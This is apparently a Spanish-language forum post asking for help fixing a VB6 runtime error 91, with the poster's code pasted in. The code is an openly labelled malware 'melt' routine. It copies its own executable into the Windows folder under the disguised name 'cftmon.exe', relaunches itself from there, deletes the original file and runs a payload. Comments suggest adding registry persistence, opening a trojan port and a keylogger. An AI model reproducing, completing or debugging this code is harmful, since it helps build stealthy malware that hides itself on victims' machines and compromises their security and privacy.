me di cuenta de mi error.. me falto una linea ¬¬
pero ahora me sale otro =S
si lo ejecuto sale este error:
Error '91' en tiempo de ejecución:
La variable de tipo Object o la variable de bloque With no está establecida
alguien me puede decir que estoy asiendo mal porfavor!?
les adjunto el code para que vean lo que hice
Dentro del Form1, (form principal)
call Main 'para llamar a la funcion
'i el resto de mi code, que no pongo, para que no se alarge tanto
Dentro de Module1
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
Sub Main()
'Obtenemos el nombre de nuestro ejecutable
MyName = App.EXEName
'Comprobamos si nos llamamos CTFMON
If LCase(App.EXEName) = "cftmon" Then
Call Execute
Else
Call MeltFile
End If
End Sub
Function Execute()
'Función que se encarga de borrar el archivo original a partir
'de su ruta. Al terminar ejecuta el PayLoad
On Error Resume Next
If Not IsEmpty(Command$) Then 'Verificamos si tenemos algo en los argumentos
While Dir(Command$) <> "" 'Comprobamos si existe el archivo que tenemos en los argumentos
Kill Command$ ' Si existe... lo borramos
DoEvents ' Esperamos un poco
Wend 'Bucle
End If
Call PayLoad 'Ejecutamos el resto del Malware
End Function
Function MeltFile()
'Función que copia el propio Malware en la carpeta TEMP del sistema
'con el nombre de cftmon.exe. Ejecuta luego el archivo enviando como
'argumento su propia ruta.
Dim MySelf As String
MySelf = String$(255, Chr$(0))
GetModuleFileName 0, MySelf, Len(MySelf) 'Devuele la ruta correcta de tu aplicación
FileCopy MySelf, Environ("windir") & "\cftmon.exe" copia a windows en ves de Temp
DoEvents 'Esperamos...
Shell Environ("windir") & "\cftmon.exe " & MySelf 'Ejecutamos "windows\cftmon.exe" + Ruta de tu aplicación
End 'Finalizamos (importante! xD)
End Function
Function PayLoad()
'Aqui incluimos el resto de código de tu Malware...
'Recomiendo llamar ahora a la función de AddToRegedit() para añadir la
'aplicación con el Melt (cftmon.exe) al registro, abrir el puerto del troyano
'activar el keylogger o lo que quieras programar :P
MsgBox "Si estas leyendo esto es que tu aplicación ha hecho MELT y se ha borrado el archivo original, :P", vbInformation, "Melt in VB6"
End
End Function
no es problema de Shell Environ("windir"), lo he revisado y esta bien.. me sale lo mismo si pongo tmp